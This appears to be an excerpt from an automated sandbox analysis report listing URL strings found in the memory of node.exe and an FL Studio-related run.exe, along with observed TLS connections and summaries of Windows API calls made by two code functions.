Source: node.exe, 0000000F.00000002.2913751697.0000000001801000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 0000000F.00000002.2922785102.0000000004240000.00000004.00001000.00020000.00000000.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2263968941.000000002C540000.00000004.00001000.00020000.00000000.sdmp, node.exe, 00000017.00000002.2240618921.0000000001801000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://github.com/v8/v8/blob/d6ead37d265d7215cf9c5f768f279e21bd170212/src/js/prologue.js#L152-L156
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://goo.gl/t5IS6M).
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://heycam.github.io/webidl/#define-the-operations
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-class-string
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-default-iterator-object
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-iterator-prototype-object
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-interfaces
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterable
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterable-entries
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterators
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-namespaces
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-operations
Source: node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-stringifier
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#ascii-serialisation-of-an-origin
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#concept-origin-opaque
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-setinterval
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/webappapis.html#windoworworkerglobalscope
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://invisible-island.net/ncurses/terminfo.ti.html#toc-_Specials
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://invisible-island.net/xterm/ctlseqs/ctlseqs.html
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://linux.die.net/man/1/dircolors).
Source: node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://mathiasbynens.be/notes/javascript-encoding
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://no-color.org/
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://nodejs.org/
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://nodejs.org/api/cli.html#cli_unhandled_rejections_mode).
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://nodejs.org/api/fs.html
Source: node.exe, 0000001E.00000002.2323547377.0000000013D1A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/
Source: node.exe, 00000017.00000002.2261157825.0000000021DE2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/t
Source: node.exe, 0000001E.00000002.2323547377.0000000013D1A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/v12.22.12/node-v12.22.12-headers.tar.gz
Source: node.exe, 0000000F.00000002.2925861243.000000003AA40000.00000004.00001000.00020000.00000000.sdmp, node.exe, 00000017.00000002.2265085240.0000000033440000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/v12.22.12/node-v12.22.12-headers.tar.gze
Source: node.exe, 00000017.00000002.2265085240.0000000033440000.00000004.00001000.00020000.00000000.sdmp, node.exe, 00000017.00000002.2261157825.0000000021DE2000.00000004.00001000.00020000.00000000.sdmp, node.exe, 0000001E.00000002.2323547377.0000000013D1A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/v12.22.12/node-v12.22.12.tar.gz
Source: node.exe, 00000017.00000002.2261157825.0000000021DE2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/v12.22.12/node-v12.22.12.tar.gzd
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://nodejs.org/download/release/v12.22.12/node-v12.22.12.tar.gzhttps://nodejs.org/download/relea
Source: node.exe, 0000001E.00000002.2323547377.0000000013D1A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/v12.22.12/node-v12.22.12.tar.gzh~
Source: node.exe, 0000000F.00000002.2921222937.0000000001F88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/v12.22.12/node-v12.22.12.tar.gzk
Source: node.exe, 0000001E.00000002.2323547377.0000000013D1A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/v12.22.12/win-x86/node.lib
Source: node.exe, 0000000F.00000002.2921222937.0000000001F88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/v12.22.12/win-x86/node.lib)
Source: node.exe, 0000000F.00000003.2238553183.0000000032CA2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/v12.22.12/win-x86/node.libLy
Source: node.exe, 00000017.00000002.2265085240.0000000033440000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/v12.22.12/win-x86/node.libUP
Source: node.exe, 00000017.00000002.2243108049.0000000002114000.00000004.00000020.00020000.00000000.sdmp, node.exe, 00000017.00000003.2240105506.000000000210F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/v12.22.12/win-x86/node.libfr
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://nodejs.org/en/docs/inspector
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://nodejs.org/en/docs/inspectorFor
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://nodejs.org/static/images/favicons/favicon.ico
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://nodejs.org/static/images/favicons/favicon.icodevtoolsFrontendUrldevtoolsFrontendUrlCompatweb
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://sourcemaps.info/spec.html
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://stackoverflow.com/a/5501711/3561
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://streamer.image-line.com
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://streamer.image-line.com/stream/download?
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.image-line.com/
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.image-line.com/action/knowledgebase/?ans=655
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.image-line.com/action/license/serial?serial=%s
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.image-line.com/action/redirect/FLStudioAuthentication?username=%s&password=%s&flags=
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.image-line.com/api.php?call=product_description_inapp&callback=il_product_descriptio
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.image-line.com/jshop/
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.image-line.com/jshop/?ord=%s
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.image-line.com/member/regcode.php?inapp=1UH
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.image-line.com/member/regfile_unlock.php?username=%s&password=%s&checksum=%s&flags=%
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.image-line.com/redirect/
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.image-line.com/redirect/FLStudio%sHelp
Source: run.exe, 00000002.00000003.1768566979.000001981A9C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.image-line.com/redirect/FLStudio_TrialExit%d
Source: run.exe, 00000002.00000003.1768566979.000001981A9C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.image-line.com/redirect/NewVersionNewsImage?image=/newversion.jpg
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.image-line.com/redirect/contentlib
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.image-line.com/redirect/downloadnewsrss
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.image-line.com/redirect/downloadversionsxml
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.image-line.com/redirect/me
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slot
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-%iteratorprototype%-object
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-%typedarray%.of
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-object.prototype.tostring
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2397#section-2
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3492#section-3.4
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3986#section-3.2.2
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.2
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.6
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7540#section-8.1.2.5
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://url.spec.whatwg.org/#cannot-have-a-username-password-port
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-url
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-url-origin
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-byte-serializer
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-parser
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-serializer
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://url.spec.whatwg.org/#url
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams-stringification-behavior
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://w3c.github.io/webappsec-subresource-integrity/#the-integrity-attribute
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://wiki.squid-cache.org/SquidFaq/InnerWorkings#What_is_a_half-closed_filedescriptor.3F
Source: node.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmp, node.exe, 0000000F.00000003.2451444266.00000000042D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel
Source: node.exe, 0000000F.00000002.2922964130.00000000042D7000.00000004.00000020.00020000.00000000.sdmp, node.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmp, node.exe, 0000000F.00000003.2451444266.00000000042D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel05
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-line-terminators
Source: node.exe, 0000000F.00000002.2913751697.0000000001801000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 0000000F.00000002.2922785102.0000000004240000.00000004.00001000.00020000.00000000.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2263968941.000000002C540000.00000004.00001000.00020000.00000000.sdmp, node.exe, 00000017.00000002.2240618921.0000000001801000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-promise.all
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-timeclip
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/5.1/#sec-15.1.3.4
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Alternative
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Atom
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-CharacterClass
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-CharacterClassEscape
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtom
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtomNoDash
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassRanges
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ControlEscape
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ControlLetter
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-DecimalDigits
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-DecimalEscape
Source: run.exe, 00000002.00000003.1768566979.000001981A9C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flstudio.com
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=vst
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.iana.org/assignments/tls-extensiontype-values
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.image-line.com/content/by/
Source: run.exe, 00000002.00000003.1768566979.000001981A9C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.image-line.com/externalMediaDlg.html
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.image-line.com/flstudio/callback.html
Source: run.exe, 00000002.00000003.1768566979.000001981A9C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.image-line.com/newreleases/?username=%s&productcodes=%s&productversions=%s
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.unicode.org/Public/UNIDATA/EastAsianWidth.txt
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/uploadexplore
Source: node.exe, 0000000F.00000002.2922058838.0000000002050000.00000004.00000020.00020000.00000000.sdmp, node.exe, 0000000F.00000003.2451571484.0000000002050000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/
Source: node.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
Source: unknownHTTPS traffic detected: 172.67.152.151:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.152.151:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.221.242.90:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.221.242.90:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.152.151:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpCode function: 13_2_0040558F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,13_2_0040558F
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FB97B08: wcscpy,CreateFileW,CloseHandle,wcscpy,wcscpy,CreateDirectoryW,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,2_2_00007FF75FB97B08
